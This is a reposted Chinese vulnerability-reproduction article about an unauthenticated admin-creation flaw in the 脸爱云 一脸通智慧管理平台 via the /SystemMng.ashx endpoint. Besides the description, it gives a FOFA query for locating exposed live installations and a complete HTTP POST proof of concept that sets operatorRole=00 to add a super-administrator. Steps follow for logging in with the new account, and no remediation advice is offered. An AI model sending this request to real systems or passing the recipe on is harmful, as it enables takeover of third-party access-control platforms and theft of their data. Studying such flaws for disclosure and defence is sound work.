【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞

admin 2023年11月22日20:05:44评论91 views字数 1244阅读4分8秒阅读模式

大家可以把蚁剑安全实验室设为星标”,这样就可以及时看到我们最新发布的“漏洞预警”及“漏洞复现”的安全内容啦!

【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞


免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

一、漏洞描述

脸爱云一脸通智慧管理平台是一套功能强大,运行稳定、操作简单方便、用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。该管理平台/SystemMng.ashx接口处存在权限绕过漏洞,可通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证攻击者可以通过此漏洞创建超级管理员账户,造成信息泄露和后台接管

二、漏洞影响版本

版本<=1.0.55.0.0.1

三、漏洞复现

1、fofa语法查找:title=="欢迎使用脸爱云 一脸通智慧管理平台"

【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞

2、登录页面如下:

【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞

3、使用下述POC进行漏洞复现:

POST /SystemMng.ashx HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/top.htmlConnection: closeCookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23yUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 175
operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

4、访问系统抓包进行拦截数据包,进行poc替换,响应包回显200说明添加用户成功,我们接着使用创建的账密进行登录。

【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞

5、使用创建的账密进行登录测试,发现登录成功:

【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞

原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月22日20:05:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】脸爱云 一脸通智慧管理平台任意用户添加漏洞https://cn-sec.com/archives/2229568.html

发表评论

匿名网友 填写信息